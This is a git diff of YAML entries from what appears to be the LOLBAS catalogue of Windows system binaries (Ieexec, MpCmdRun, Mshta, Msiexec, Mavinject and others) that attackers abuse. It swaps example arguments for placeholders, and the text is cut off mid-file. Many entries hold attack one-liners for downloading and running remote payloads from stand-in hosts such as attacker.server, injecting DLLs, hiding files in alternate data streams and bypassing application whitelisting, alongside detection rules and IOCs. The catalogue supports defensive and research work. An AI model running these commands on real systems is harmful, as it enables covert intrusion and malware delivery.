@@ -1,10 +1,10 @@ --- Name: IMEWDBLD.exe Description: Microsoft IME Open Extended Dictionary Module -Author: 'Wade Hickey' +Author: Wade Hickey Created: 2020-03-05 Commands: - - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL} Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache. Usecase: Download file from Internet Category: Download diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index 80c6cc5..0e28545 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -1,7 +1,7 @@ --- Name: Ie4uinit.exe Description: Executes commands from a specially prepared ie4uinit.inf file. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: ie4uinit.exe -BaseSettings @@ -18,8 +18,6 @@ Full_Path: - Path: c:\windows\sysWOW64\ie4uinit.exe - Path: c:\windows\system32\ieuinit.inf - Path: c:\windows\sysWOW64\ieuinit.inf -Code_Sample: - - Code: Detection: - IOC: ie4uinit.exe copied outside of %windir% - IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir% diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index 056e30e..52ea092 100644 --- a/yml/OSBinaries/Iediagcmd.yml +++ b/yml/OSBinaries/Iediagcmd.yml @@ -4,7 +4,7 @@ Description: Diagnostics Utility for Internet Explorer Author: manasmbellani Created: 2022-03-29 Commands: - - Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:c:\test\foo.cab' + - Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}' Description: Executes binary that is pre-planted at C:\test\system32\netsh.exe. Usecase: Spawn a pre-planted executable from iediagcmd.exe. Category: Execute 
diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index f397b37..fefe0e4 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -1,11 +1,11 @@ --- Name: Ieexec.exe Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Description: Downloads and executes bypass.exe from the remote server. + - Command: ieexec.exe {REMOTEURL:.exe} + Description: Downloads and executes executable from the remote server. Usecase: Download and run attacker code from remote location Category: Download Privileges: User @@ -14,8 +14,8 @@ Commands: Tags: - Execute: Remote - Execute: EXE (.NET) - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Description: Downloads and executes bypass.exe from the remote server. + - Command: ieexec.exe {REMOTEURL:.exe} + Description: Downloads and executes executable from the remote server. Usecase: Download and run attacker code from remote location Category: Execute Privileges: User @@ -27,8 +27,6 @@ Commands: Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index af0ddcd..cf9b79f 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml 
@@ -4,14 +4,14 @@ Description: used for compile c# code into dll or exe. Author: Hai vaknin (lux) Created: 2020-03-17 Commands: - - Command: ilasm.exe C:\public\test.txt /exe + - Command: ilasm.exe {PATH_ABSOLUTE:.txt} /exe Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - - Command: ilasm.exe C:\public\test.txt /dll + - Command: ilasm.exe {PATH_ABSOLUTE:.txt} /dll Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll Usecase: A description of the usecase Category: Compile @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe -Code_Sample: - - Code: Detection: - IOC: Ilasm may not be used often in production environments (such as on endpoints) - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml @@ -32,4 +30,3 @@ Acknowledgement: - Person: Hai Vaknin(Lux) Handle: '@VakninHai' - Person: Lior Adar - Handle: diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index d0f129a..0f3b379 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -1,10 +1,10 @@ --- Name: Infdefaultinstall.exe Description: Binary used to perform installation based on content inside inf files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: InfDefaultInstall.exe Infdefaultinstall.inf + - Command: InfDefaultInstall.exe {PATH:.inf} Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. Usecase: Code execution Category: Execute 
diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index c9f29fe..f14239a 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -4,7 +4,7 @@ Description: The Installer tool is a command-line utility that allows you to ins Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + - Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll} Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting Category: AWL Bypass @@ -14,7 +14,7 @@ Commands: Tags: - Execute: DLL (.NET) - Execute: EXE (.NET) - - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + - Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll} Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting Category: Execute @@ -24,7 +24,7 @@ Commands: Tags: - Execute: DLL (.NET) - Execute: EXE (.NET) - - Command: InstallUtil.exe https://example.com/payload + - Command: InstallUtil.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 3a5f5a6..a0b3e49 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml 
@@ -1,11 +1,11 @@ --- Name: Jsc.exe Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2019-05-31 Commands: - - Command: jsc.exe scriptfile.js - Description: Use jsc.exe to compile JavaScript code stored in scriptfile.js and output scriptfile.exe. + - Command: jsc.exe {PATH:.js} + Description: Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - - Command: jsc.exe /t:library Library.js - Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. + - Command: jsc.exe /t:library {PATH:.js} + Description: Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User @@ -27,8 +27,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml - IOC: Jsc.exe should normally not run a system unless it is used for development. diff --git a/yml/OSBinaries/Ldifde.yml b/yml/OSBinaries/Ldifde.yml index 9cc707d..cb31bf5 100644 --- a/yml/OSBinaries/Ldifde.yml +++ b/yml/OSBinaries/Ldifde.yml 
@@ -1,11 +1,11 @@ --- Name: Ldifde.exe Description: Creates, modifies, and deletes LDAP directory objects. -Author: 'Grzegorz Tworek' +Author: Grzegorz Tworek Created: 2022-08-31 Commands: - - Command: Ldifde -i -f inputfile.ldf - Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder. + - Command: Ldifde -i -f {PATH:.ldf} + Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder. Usecase: Download file from Internet Category: Download Privileges: Administrator diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 9dfec80..c0f6208 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -4,7 +4,7 @@ Description: Binary to package existing files into a cabinet (.cab) file Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab + - Command: makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream Category: ADS @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab + - Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an alternate data stream Category: ADS 
@@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab + - Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab} Description: Download and compresses the target file and stores it in the target file. Usecase: Download file and compress into a cab file Category: Download @@ -31,7 +31,7 @@ Commands: OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: makecab /F directives.ddf + - Command: makecab /F {PATH:.ddf} Description: Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification. Usecase: Bypass command-line based detections Category: Execute diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index 33e2aa7..5606b70 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -1,10 +1,10 @@ --- Name: Mavinject.exe Description: Used by App-v in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll + - Command: MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll} Description: Inject evil.dll into a process with PID 3110. Usecase: Inject dll file into running process Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" + - Command: Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process Category: ADS 
diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index cd12895..75539d3 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -1,11 +1,11 @@ --- Name: Microsoft.Workflow.Compiler.exe Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code. -Author: 'Conor Richard' +Author: Conor Richard Created: 2018-10-22 Commands: - - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml - Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file. + - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log} + Description: Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted). Usecase: Compile and run code Category: Execute Privileges: User @@ -14,7 +14,7 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt + - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log} Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code Category: Execute @@ -23,7 +23,7 @@ Commands: OperatingSystem: Windows 10S, Windows 11 Tags: - Execute: XOML - - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt + - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log} Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code Category: AWL Bypass 
@@ -34,8 +34,6 @@ Commands: - Execute: XOML Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml - Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index dab5e49..44eefd4 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -4,7 +4,7 @@ Description: Load snap-ins to locally and remotely manage Windows systems Author: '@bohops' Created: 2018-12-04 Commands: - - Command: mmc.exe -Embedding c:\path\to\test.msc + - Command: mmc.exe -Embedding {PATH_ABSOLUTE:.msc} Description: Launch a 'backgrounded' MMC process and invoke a COM payload Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry Category: Execute @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index de2efaa..62e0de7 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml 
@@ -1,26 +1,26 @@ --- Name: MpCmdRun.exe Description: Binary part of Windows Defender. Used to manage settings in Windows Defender -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2020-03-20 Commands: - - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe + - Command: MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe} Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) Usecase: Download file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10 - - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe + - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation] Usecase: Download file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10 - - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe + - Command: MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe Description: Download file to machine and store it in Alternate Data Stream - Usecase: Hide downloaded data inton an Alternate Data Stream + Usecase: Hide downloaded data into an Alternate Data Stream Category: ADS Privileges: User MitreID: T1564.004 
@@ -32,8 +32,6 @@ Full_Path: - Path: C:\Program Files\Windows Defender\MpCmdRun.exe - Path: C:\Program Files (x86)\Windows Defender\MpCmdRun.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\X86\MpCmdRun.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml - Elastic: https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml @@ -53,6 +51,5 @@ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' - Person: RichRumble - Handle: '' - Person: Cedric Handle: '@th3c3dr1c' diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 04ff916..a145cb8 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -1,10 +1,10 @@ --- Name: Msbuild.exe Description: Used to compile and execute code -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: msbuild.exe pshell.xml + - Command: msbuild.exe {PATH:.xml} Description: Build and execute a C# project stored in the target XML file. Usecase: Compile and run code Category: AWL Bypass @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CSharp - - Command: msbuild.exe project.csproj + - Command: msbuild.exe {PATH:.csproj} Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code Category: Execute 
@@ -22,8 +22,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CSharp - - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo - Description: Executes generated Logger DLL file with TargetLogger export + - Command: msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo + Description: Executes generated Logger DLL file with TargetLogger export. Usecase: Execute DLL Category: Execute Privileges: User @@ -31,8 +31,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: msbuild.exe project.proj - Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. + - Command: msbuild.exe {PATH:.proj} + Description: Execute JScript/VBScript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters Category: Execute Privileges: User @@ -40,7 +40,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: XSL - - Command: msbuild.exe @sample.rsp + - Command: msbuild.exe @{PATH:.rsp} Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections Category: Execute 
@@ -57,8 +57,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index f8c829e..aff184e 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -1,7 +1,7 @@ --- Name: Msconfig.exe Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Msconfig.exe -5 diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index e681104..28eef54 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -1,11 +1,11 @@ --- Name: Msdt.exe Description: Microsoft diagnostics tool -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. + - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE + Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file. Usecase: Execute code Category: Execute Privileges: User 
@@ -14,8 +14,8 @@ Commands: Tags: - Application: GUI - Execute: MSI - - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. + - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE + Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file. Usecase: Execute code bypass Application whitelisting Category: AWL Bypass Privileges: User diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml index d0cc16d..de9d6a7 100644 --- a/yml/OSBinaries/Msedge.yml +++ b/yml/OSBinaries/Msedge.yml 
@@ -4,22 +4,22 @@ Description: Microsoft Edge browser Author: mr.d0x Created: 2022-01-20 Commands: - - Command: msedge.exe https://example.com/file.exe.txt - Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen. + - Command: msedge.exe {REMOTEURL:.exe.txt} + Description: Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64 + - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "{REMOTEURL:.base64.html}" > {PATH:.b64} Description: Edge will silently download the file. File extension should be .html and binaries should be encoded. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" - Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the ping command + - Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&" + Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index eb8167d..ed750fb 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml 
@@ -4,7 +4,7 @@ Description: Used by Windows to execute html applications. (.hta) Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: mshta.exe evilfile.hta + - Command: mshta.exe {PATH:.hta} Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code Category: Execute @@ -14,7 +14,7 @@ Commands: Tags: - Execute: HTA - Execute: Remote - - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) + - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code Category: Execute @@ -23,7 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: VBScript - - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); + - Command: mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code Category: Execute @@ -32,7 +32,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - - Command: mshta.exe "C:\ads\file.txt:file.hta" + - Command: mshta.exe "{PATH_ABSOLUTE}:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream Category: ADS @@ -41,7 +41,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) Tags: - Execute: HTA - - Command: mshta.exe https://example.com/payload + - Command: mshta.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download 
diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 7de2d33..a57b9a6 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -1,10 +1,10 @@ --- Name: Msiexec.exe Description: Used by Windows to execute msi files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: msiexec /quiet /i cmd.msi + - Command: msiexec /quiet /i {PATH:.msi} Description: Installs the target .MSI file silently. Usecase: Execute custom made msi file with attack code Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png + - Command: msiexec /q /i {REMOTEURL} Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server Category: Execute @@ -23,7 +23,7 @@ Commands: Tags: - Execute: MSI - Execute: Remote - - Command: msiexec /y "C:\folder\evil.dll" + - Command: msiexec /y {PATH_ABSOLUTE:.dll} Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files Category: Execute @@ -33,7 +33,7 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Command: msiexec /z "C:\folder\evil.dll" + - Command: msiexec /z {PATH_ABSOLUTE:.dll} Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files Category: Execute 
@@ -43,7 +43,7 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb + - Command: msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server Category: Execute diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index 0689edd..8238aec 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -1,10 +1,10 @@ --- Name: Netsh.exe Description: Netsh is a Windows tool used to manipulate network interface settings. -Author: 'Freddie Barr-Smith' +Author: Freddie Barr-Smith Created: 2019-12-24 Commands: - - Command: netsh.exe add helper C:\Users\User\file.dll + - Command: netsh.exe add helper {PATH_ABSOLUTE:.dll} Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called Usecase: Proxy execution of .dll Category: Execute diff --git a/yml/OSBinaries/Ngen.yml b/yml/OSBinaries/Ngen.yml index 82b1870..d9e18d9 100644 --- a/yml/OSBinaries/Ngen.yml +++ 